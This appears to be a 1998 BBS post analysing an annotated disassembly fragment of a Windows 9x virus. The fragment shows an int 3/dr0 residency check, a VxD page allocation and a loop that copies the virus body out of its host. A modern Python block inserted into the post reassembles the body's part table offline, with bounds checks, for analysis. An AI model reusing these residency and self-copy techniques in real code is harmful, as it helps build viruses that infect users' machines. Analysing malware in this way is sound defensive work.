From: crazydiamond()
Compiled by: jia (1998-10-26 01:23:53), on-site mail
Continued from the previous part:

:00000036 int 03                          ; jump to 00000063
.......
:00000063 je 00000097                     ; is this the second call? if so, jump
:00000065 mov ecx,dr0
:00000068 jecxz 0000007A                  ; residency check: if dr0 is zero, continue
:0000006A add dword ptr [esp], 00000015
:0000006E mov word ptr [ebx-04], bp
:00000072 shr ebp, 10
:00000075 mov word ptr [ebx+02], bp       ; restore the original int 3 and return
:00000079 iret
:0000007A mov dr0,ebx
:0000007D push 0000000F
:0000007F push ecx
:00000080 push FFFFFFFF
:00000082 push ecx
:00000083 push ecx
:00000084 push ecx
:00000085 push 00000001
:00000087 push 00000002
:00000089 vxdcall _PageAllocate
:0000008F add esp, 20
:00000091 xchg eax,edi                    ; edi points to the allocated page
:00000093 lea eax,[esi-63]
:00000096 iret                            ; return to 00000037
.......
:00000037 push esi                        ; eax points to the start of the virus code: 00000000
:00000038 mov esi, eax
:0000003A mov ecx, dword ptr [eax-04]
:0000003D repz
:0000003E movsb
:0000003F sub eax, 00000008
:00000042 mov esi, dword ptr [eax]
:00000044 or esi, esi
:00000046 je 0000004A
:00000048 jmp 0000003A                    ; the virus body pulls itself out of the host program and copies
                                          ; itself into the allocated memory page, completing residency
                                          ; the virus body's layout information is arranged as
                                          ;   partN start, partN length, ......, part1 start, part1 length
                                          ; laid out backwards from the start of the virus code (i.e. 00000000),
                                          ; one machine word each
:0000004A ......
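For an analyst who wants to recover the resident body from an infected image without executing it, the copy loop at 00000037..00000048 is effectively a parser for the part table that sits below the virus code start. The Python below is an added example written for this post, not code from the post or from the virus; it reads the table the way the loop does (my reading of the listing: [start-4] is the length of the part at `start`, then [start-8] is the next part's start, 0 terminating, [start-12] its length, and so on), but bounds-checks every entry instead of trusting it. The image is a constructed flat byte buffer with offsets used directly as addresses; in a real PE the entries are virtual addresses that would first have to be mapped to file offsets.

```python
import struct

# Layout assumed from the listing (my reading, not stated verbatim on the page),
# walking backwards from code_start in 4-byte steps:
#   [code_start - 4]  = length of the part that begins at code_start
#   [code_start - 8]  = start of the next part (0 terminates the table)
#   [code_start - 12] = length of that part
#   [code_start - 16] = start of the following part, ... and so on.


def reassemble(image: bytes, code_start: int, max_parts: int = 64) -> bytes:
    """Mirror the copy loop and gather the scattered parts into one body.

    Unlike the loop in the listing, every table entry and every copy range is
    checked against the image size, so a malformed image raises ValueError
    instead of reading out of range.  max_parts guards against a table that
    never reaches the 0 terminator.
    """

    def dword(off: int) -> int:
        if off < 0 or off + 4 > len(image):
            raise ValueError(f"table entry at {off:#x} lies outside the image")
        return struct.unpack_from("<I", image, off)[0]

    body = bytearray()
    entry = code_start        # plays the role of eax in the listing
    part_start = code_start   # plays the role of esi in the listing
    for _ in range(max_parts):
        length = dword(entry - 4)                          # mov ecx, [eax-04]
        if part_start + length > len(image):
            raise ValueError(f"part at {part_start:#x}+{length:#x} exceeds image")
        body += image[part_start:part_start + length]      # repz movsb
        entry -= 8                                         # sub eax, 8
        part_start = dword(entry)                          # mov esi, [eax]
        if part_start == 0:                                # or esi,esi / je
            return bytes(body)
    raise ValueError("part table not terminated within max_parts entries")


def reassemble_or_none(image: bytes, code_start: int):
    """Convenience wrapper: None instead of an exception for a bad image."""
    try:
        return reassemble(image, code_start)
    except ValueError:
        return None


def build_image(parts, code_start: int, size: int = 0x400) -> bytes:
    """Construct a sample image: place each (offset, data) part and write the
    table below code_start in the layout described above.  The first part
    must begin at code_start, exactly as the loop assumes."""
    assert parts[0][0] == code_start, "first part must start at code_start"
    image = bytearray(size)
    table = []                      # dwords from code_start-4 downwards
    for i, (off, data) in enumerate(parts):
        image[off:off + len(data)] = data
        if i > 0:
            table.append(off)       # start of this part
        table.append(len(data))     # its length
    table.append(0)                 # terminator
    for k, value in enumerate(table):
        struct.pack_into("<I", image, code_start - 4 * (k + 1), value)
    return bytes(image)


# Constructed sample: three fragments scattered through a 1 KiB image, with
# the table written immediately below the first fragment at 0x100.
CODE_START = 0x100
PARTS = [
    (CODE_START, b"PART-ONE"),
    (0x200, b"part-two-data"),
    (0x300, b"3rd"),
]
SAMPLE = build_image(PARTS, CODE_START)

# Constructed malformed sample: first length patched to a huge value.
BAD = bytearray(SAMPLE)
struct.pack_into("<I", BAD, CODE_START - 4, 0xFFFFFFFF)
BAD = bytes(BAD)

if __name__ == "__main__":
    print(reassemble(SAMPLE, CODE_START))        # b'PART-ONEpart-two-data3rd'
    print(reassemble_or_none(BAD, CODE_START))   # None
```

The bounds checks are the point of the exercise: the loop in the listing dereferences whatever the table says, which is acceptable for the virus but not for a tool that must survive a deliberately corrupted sample.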
-- ............
※ Source: Guangzhou NetEase BBS bbs.nease.net [FROM: 202.96.101.254]